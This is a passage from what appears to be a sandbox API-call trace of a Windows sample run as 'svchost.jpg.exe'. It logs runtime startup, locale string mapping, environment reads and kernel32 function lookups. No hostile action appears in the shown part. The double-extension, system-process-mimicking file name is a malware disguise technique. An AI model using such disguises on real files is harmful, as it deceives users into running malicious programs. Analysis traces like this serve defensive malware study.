!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ냪+Ā", cchSrc=256, lpCharType=0x5af228 | out: lpCharType=0x5af228) returned 1 [0019.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0019.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x5aef68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0019.644] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.644] GetLastError () returned 0x57 [0019.644] GetProcAddress (hModule=0x75a20000, lpProcName="LCMapStringEx") returned 0x75ab47f1 [0019.644] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0019.644] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x5aed58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0019.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x5af728, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa1\x41\x19\xbc\x64\xf9\x5a", lpUsedDefaultChar=0x0) returned 256 [0019.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0019.644] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5af828, cbMultiByte=256, lpWideCharStr=0x5aef88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ눀+Ā") returned 256 [0019.644] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ눀+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0019.644] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ눀+Ā", cchSrc=256, lpDestStr=0x5aed78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0019.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x5af628, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa1\x41\x19\xbc\x64\xf9\x5a", lpUsedDefaultChar=0x0) returned 256 [0019.645] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5af770, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\svchost.jpg.exe")) returned 0x35 [0019.645] GetProcAddress (hModule=0x75a20000, lpProcName="AreFileApisANSI") returned 0x75ab40d1 [0019.645] AreFileApisANSI () returned 1 [0019.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0019.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe", cchWideChar=-1, lpMultiByteStr=0x2e8d98, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe", lpUsedDefaultChar=0x0) returned 54 [0019.645] RtlInitializeSListHead (in: ListHead=0x2e8710 | out: ListHead=0x2e8710) [0019.645] GetLastError () returned 0x0 [0019.645] SetLastError (dwErrCode=0x0) [0019.645] GetEnvironmentStringsW () returned 0x9c5248* [0019.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0019.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x9c5d20, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0019.646] FreeEnvironmentStringsW (penv=0x9c5248) returned 1 [0019.647] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a20000 [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="FlsAlloc") returned 0x75a34f2b [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="FlsFree") returned 0x75a3359f [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="FlsGetValue") returned 0x75a31252 [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="FlsSetValue") returned 0x75a34208 [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="InitializeCriticalSectionEx") returned 0x75a34d28 [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="InitOnceExecuteOnce") returned 0x75a4d627 [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="CreateEventExW") returned 0x75ab410b [0019.647] GetProcAddress (hModule=0x75a20000, lpProcName="CreateSemaphoreW") returned 0x75a4ca5a [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CreateSemaphoreExW") returned 0x75ab4195 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CreateThreadpoolTimer") returned 0x75a4ee7e [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="SetThreadpoolTimer") returned 0x7789441c [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x778bc50e [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CloseThreadpoolTimer") returned 0x778bc381 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CreateThreadpoolWait") returned 0x75a4f088 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="SetThreadpoolWait") returned 0x778a05d7 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CloseThreadpoolWait") returned 0x778bca24 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="FlushProcessWriteBuffers") returned 0x77870b8c [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7792fde8 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="GetCurrentProcessorNumber") returned 0x778c1e1d [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="CreateSymbolicLinkW") returned 0x75aacd11 [0019.648] GetProcAddress (hModule=0x75a20000, lpProcName="GetCurrentPackageId") returned 0x0 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="GetTickCount64") returned 0x75a4eee0 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="GetFileInformationByHandleEx") returned 0x75a4c78f [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="SetFileInformationByHandle") returned 0x75a5cbfc [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="InitializeConditionVariable") returned 0x77888456 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="WakeConditionVariable") returned 0x778f7de4 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="WakeAllConditionVariable") returned 0x778b409d [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="SleepConditionVariableCS") returned 0x75ab4b32 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="InitializeSRWLock") returned 0x77888456 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="AcquireSRWLockExclusive") returned 0x778829f1 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77894892 [0019.649] GetProcAddress (hModule=0x75a20000, lpProcName="ReleaseSRWLockExclusive") returned 0x778829ab [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="SleepConditionVariableSRW") returned 0x75ab4b74 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="CreateThreadpoolWork") returned 0x75a4ee45 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="SubmitThreadpoolWork") returned 0x778c8491 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="CloseThreadpoolWork") returned 0x778bd8e2 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="CompareStringEx") returned 0x75ab46b1 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="GetLocaleInfoEx") returned 0x75ab4751 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="LCMapStringEx") returned 0x75ab47f1 [0019.650] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x0 [0019.650] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a20000 [0019.650] GetProcAddress (hModule=0x75a20000, lpProcName="InitializeConditionVariable") returned 0x77888456 [0019.651] GetProcAddress (hModule=0x75a20000, lpProcName="SleepConditionVariableCS") returned 0x75ab4b32 [0019.651] GetProcAddress (hModule=0x75a20000, lpProcName="WakeAllConditionVariable") returned 0x778b409d [0019.651] RtlInitializeConditionVariable () returned 0x2e8700 [0019.651] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0019.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x292151) returned 0x0 [0019.652] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.652] GetLastError () returned 0x57 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="CompareStringEx") returned 0x75ab46b1 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="EnumSystemLocalesEx") returned 0x75ab424f [0019.653] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.653] GetLastError () returned 0x57 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="GetDateFormatEx") returned 0x75ac6676 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="GetLocaleInfoEx") returned 0x75ab4751 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="GetTimeFormatEx") returned 0x75ac65f1 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="GetUserDefaultLocaleName") returned 0x75ab47c1 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="IsValidLocaleName") returned 0x75ab47e1 [0019.653] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0019.653] GetLastError () returned 0x57 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="LCIDToLocaleName") returned 0x75a5ced4 [0019.653] GetProcAddress (hModule=0x75a20000, lpProcName="LocaleNameToLCID") returned 0x75ab4801 [0019.654] GetLastError () returned 0x57 [0019.654] SetLastError (dwErrCode=0x57) [0019.654] GetLastError () returned 0x57 [0019.654] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] 